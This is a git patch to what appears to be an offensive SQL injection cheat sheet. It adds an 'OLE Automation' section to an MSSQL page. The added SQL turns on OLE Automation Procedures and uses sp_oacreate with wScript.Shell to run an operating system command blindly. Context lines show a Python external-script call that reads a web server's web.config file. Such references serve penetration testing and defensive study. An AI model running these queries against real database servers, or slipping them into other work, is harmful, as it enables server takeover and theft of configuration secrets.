From 3c96a15f58dd0c52ba2380c43d7ffa6b67923654 Mon Sep 17 00:00:00 2001 From: f0rk3b0mb Date: Tue, 28 Apr 2026 12:07:54 +0300 Subject: [PATCH] added ole automation command execution --- SQL Injection/MSSQL Injection.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 28bc4f3e..d2ca3b55 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -22,6 +22,7 @@ * [MSSQL Command Execution](#mssql-command-execution) * [XP_CMDSHELL](#xp_cmdshell) * [Python Script](#python-script) + * [OLE Automation](#ole-automation) * [MSSQL Out of Band](#mssql-out-of-band) * [MSSQL DNS Exfiltration](#mssql-dns-exfiltration) * [MSSQL UNC Path](#mssql-unc-path) @@ -295,6 +296,33 @@ EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__im EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())' ``` +### OLE Automation + +`Object Linking and Embedding (OLE)` is a technology that allows one application to link objects into another application. It was originally designed for Microsoft Office (e.g. to embed Excel sheets into Word documents) and eventually became the foundation for the Component Object Model (COM). OLE Automation enables a SQL server to interact with arbitrary COM objects. + +```sql +-- Check current status + +EXEC sp_configure 'Ole Automation Procedures'; + +-- Enable OLE Automation + +EXEC sp_configure 'Ole Automation Procedures', 1; +RECONFIGURE; + +-- Verify it's enabled + +EXEC sp_configure 'Ole Automation Procedures'; + +-- run command + +DECLARE @output INT; DECLARE @ProgramToRun VARCHAR(500); SET @ProgramToRun = 'Run("whoami")'; EXEC sp_oacreate 'wScript.Shell', @output out; EXEC sp_oamethod @output, @ProgramToRun; EXEC sp_oadestroy @output; + + +-- NOTE that it does not print output (it is blind execution) + +``` + ## MSSQL Out of Band ### MSSQL DNS exfiltration